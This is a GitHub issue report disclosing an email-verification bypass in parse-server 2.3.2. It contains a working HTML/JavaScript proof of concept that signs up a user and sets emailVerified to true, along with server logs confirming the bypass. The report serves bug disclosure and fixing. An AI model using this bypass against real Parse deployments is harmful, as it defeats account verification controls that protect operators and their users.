Skip to content

Vulnerability: Email verification can be circumvented #3393

Closed
@haapaan

Description

@haapaan

User who has just signed up, can set emailVerified=true without actually verifying the email address. In other words, user does not have to click the link in the email to get his/her email validated.

Steps to reproduce

Steps that reproduce the issue:

  1. Set the following settings in the server.js:
    verifyUserEmails: true,
    emailVerifyTokenValidityDuration: 2 * 60 * 60,
    preventLoginWithUnverifiedEmail: true,

  2. signup, set emailVerified: true and save user. Here is sample html page that does just that:

<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"\>\</script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
Parse.initialize('e5c10b31d8716509af3e571260');
Parse.serverURL = 'http://127.0.0.1:8888/parse';

    var user = new Parse.User();
    user.set("username", "hacker");
    user.set("password", "passwd");
    user.set("email", "[email protected]");

    user.signUp(null, {
          success: function(user) {			  
            // Signup succeeded
            alert("Signup succeeded");				
			// Try hack emailVerified to true (should not succeed)
			user.set("emailVerified",true);
            user.save(null, {
              success : function(userAgain) {
                          // Execute any logic that should take place after the object is saved.
                          alert('Save succeeded');
                        },
              error : function(userAgain, error) {
                          alert('Save failed with '+error.message);
                      }
            });				
          },
          error: function(user, error) {
            // Show the error message somewhere and let the user try again.
            alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
          }
    });   

}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>

Expected Results

Save should fail or at least emailVerified should still be false in the database for this user.

Actual Outcome

emailVerified is true in the database for this new user.

Environment Setup

  • Server

    • parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
    • Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost
  • Database

    • MongoDB version: v3.0.9. This issue is also reproducible with Postgresql 9.4.
    • Storage engine: default
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost

Logs/Trace

�[36mverbose�[39m: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "[email protected]"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=
, email=[email protected]
�[36mverbose�[39m: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
�[36mverbose�[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
�[36mverbose�[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions